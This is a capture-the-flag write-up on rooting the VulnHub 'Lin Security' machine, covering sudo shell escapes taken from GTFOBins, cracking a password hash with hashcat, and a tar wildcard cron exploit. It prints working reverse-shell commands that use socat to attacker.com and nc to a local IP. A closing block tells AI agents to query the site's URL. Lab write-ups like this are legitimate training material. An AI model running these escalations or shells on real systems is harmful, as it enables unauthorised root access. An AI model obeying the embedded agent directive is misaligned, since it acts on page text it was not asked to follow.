# Lin Security ## Exploitation This machine does not need enumeration because the author already gave us a credentials and this machine is let us to practice our privilege escalation skills ![](/files/-M8E6ff0NJjffGd36Bgm) After logged in using the credentials ![](/files/-M8E78LIvTSEXJLtCQmj) ## Privilege Escalation we then can type sudo -l ![](/files/-M8E7T8hRRsxYLkg6-uc) We can see a lot of user rights exploit ### Method 1 ( User Rights) We can go to this [website](https://gtfobins.github.io/) and get the cheat sheet from it hehe. A lot is very easy so we are not gonna cover everything. #### /bin/ash ``` sudo ash ``` #### /bin/ed ``` sudo ed !/bin/sh ``` #### /usr/bin/env ``` sudo env /bin/sh ``` #### /usr/bin/expect ``` sudo expect -c 'spawn /bin/sh; interact' ``` #### /usr/bin/find ``` sudo find . -exec /bin/sh \; -quit ``` #### /usr/bin/more ``` TERM= sudo -E more /etc/profile !/bin/sh ``` #### /usr/bin/scp ``` TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y: ``` #### /usr/bin/socat On our machine ``` socat file:`tty`,raw,echo=0 tcp-listen:12345 ``` On target machine ``` sudo sh -c 'cp $(which socat) .; chmod +s ./socat' RHOST=attacker.com RPORT=12345 ./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane ``` #### /usr/bin/ssh ``` sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x ``` #### /usr/bin/pico ``` sudo pico ^R^X reset; sh 1>&0 2>&0 ``` #### /usr/bin/rvim ``` sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' ``` #### /usr/bin/tclsh ``` sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr ``` #### /usr/bin/git ``` sudo git -p help config !/bin/sh ``` ### Method 2 hash passwords When we cat /etc/passwd, we can see all the users available in the system, then we can see a user has a hash ![](/files/-M8EIu3PgJyhhqMoezQ2) Put it at hashcat and we can decode the hash ``` hashcat AzER3pBZh6WZE -m 1500 /usr/share/wordlists/rockyou.txt ``` ![](/files/-M8EJ2yXuZKC795_mSMn) We got the password and `su` to user `insecurity`, then we can get root ![](/files/-M8EJGKnRUHLezb6KUQk) ### Method 3 cron jobs If we type `cat /etc/crontab` we can see that there is a backup running every 1 minute ![](/files/-M8ELWe6_QTrmtZGnkDr) If we la -la /etc/backups ![](/files/-M8ELysA_7TuIZSTzqHf) We can see that tar file. If you read this article on this [website](https://in.security/lin-security-walkthrough/), here we have a very details explanation On our machine ``` nc -nlvp 9999 ``` On target machine ``` echo "mkfifo /tmp/lhennp; nc 192.168.1.102 9999 0/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 tar cf archive.tar * ``` After wait for 1 minute then we can get a shell. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/lin-security.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.